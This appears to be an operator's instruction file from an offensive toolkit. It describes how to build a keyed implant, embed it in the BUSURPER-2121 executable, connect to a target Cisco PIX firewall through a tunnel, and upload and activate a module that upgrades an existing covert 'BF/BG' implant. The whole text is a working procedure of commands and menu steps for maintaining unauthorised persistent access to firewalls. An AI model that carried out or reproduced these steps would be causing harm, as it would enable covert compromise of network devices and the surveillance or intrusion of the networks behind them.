### Upgrading a pix implant from a version of BF/BG to the current BG # version using the BUSURPER-2121.module ### ### Offline.. create the implant and insert the implant into the BUSURPER-2121.exe file: # If there is already an Uprade.bg2011_###.exe in this directory: # /mnt/burro/windows/EP-3.0/OfflineTools/BANANAGLEE_2.0.1.1/BANANAUSURPER_1.0.0.0/ # then you can just copy that file, the BUSURPER-2121.mod and the BUSURPER-2121.exe.bin to # your ops disk and skip down the the section titled "How # to use the BUSURPER-2121.module" ### # To create the implant, follow the instructions in "pix_create_keyed_implant.txt" # You should have created a file named like implant_701.bin # Now you need to insert that implant into the BUSURPER-2121.exe file. # NOTE: The same BUSURPER-2121.exe and BUSURPER-2121.mod are used for all versions # of BF/BG. # Copy these files into your working directory: cp -a /mnt/burro/firewalls/OfflineTools/BANANAGLEE_2.1.0.0/BANANAUSURPER_2.1.2.1/* . # Copy the implant_701.bin to your working directory # Now insert the implant_701.bin into the BUSURPER-2121.exe ./InsertImplant.sh BUSURPER-2121.exe implant_701.bin ./InsertImplant.pl -m BUSURPER-2121.exe -i implant_701.bin -d ../Dats/00000701.dat # You now have modified the BUSURPER-2121.exe file to contain the BG implant. # You need to test this module on a test pix before using it on a target. ### How to use the BUSURPER-2121.module ### # Connect to the pix with the lp to verify it still has the IOS version you built # the new implant for. # Setup tunnels on pitch -tunnel u 35442 500 500 ./lp --lp --implant --idkey --timeout 10 --sport 35402 --dport 35442 Choose option 1 to Open a session # You'll see a line like this: # "OS Version : 00000633" - this is IOS 6.3.3 Choose option 9 to close your session. Choose option 0 to close your lp. ## NOTE: Only continue on from here if the IOS on the pix matches the version you built # your new implant for. If it doesn't, go build a new one and come back. ## # Copy the BUSURPER-2121.mod module, the BUSURPER-2121.exe.bin, and the BUSURPER-2121.exe to the directory with the # other modules for the version of BF/BG you are running. This is either the # lp/Modules directory for BF or the lp/Modules/PIX directory for BG # Re-connect to the pix with the lp Choose option 1 to open a session Choose option 36 to view uploaded modules. # If there are any currently loaded modules you should remove them now. Choose option 30 to List Uploadable Modules. # Make sure "BUSURPER-2121.mod" is listed. # If it isn't listed, you don't have the BUSURPER-2121.mod and the BUSURPER-2121.exe in the # correct directory... so close the lp and move those files to the correct directory # and then come back and continue with these insructions. Choose option 31 to Upload the BUSURPER-2121.mod module Choose option 32 to Activate the BUSURPER-2121.mod module # At this point communications will time out on the LP. You can verify by choosing # Option 10 and tring to read the Interface info. When it times out, it means you # have either upgraded successfully, the pix is rebooting, or it's dead. # Now, lets continue on the assumption you did everything correctly.. # Go to the BG directory that matches the new implant. # Connect to the pix with the lp and the same key you used before. Choose Option 1 to open a session. # If you see "Implant Version: 2.0.1", you are successful! # Now you have the opportunity to speedplow the pix with the new version # of the implant (Which you should have prepared and tested before your op!)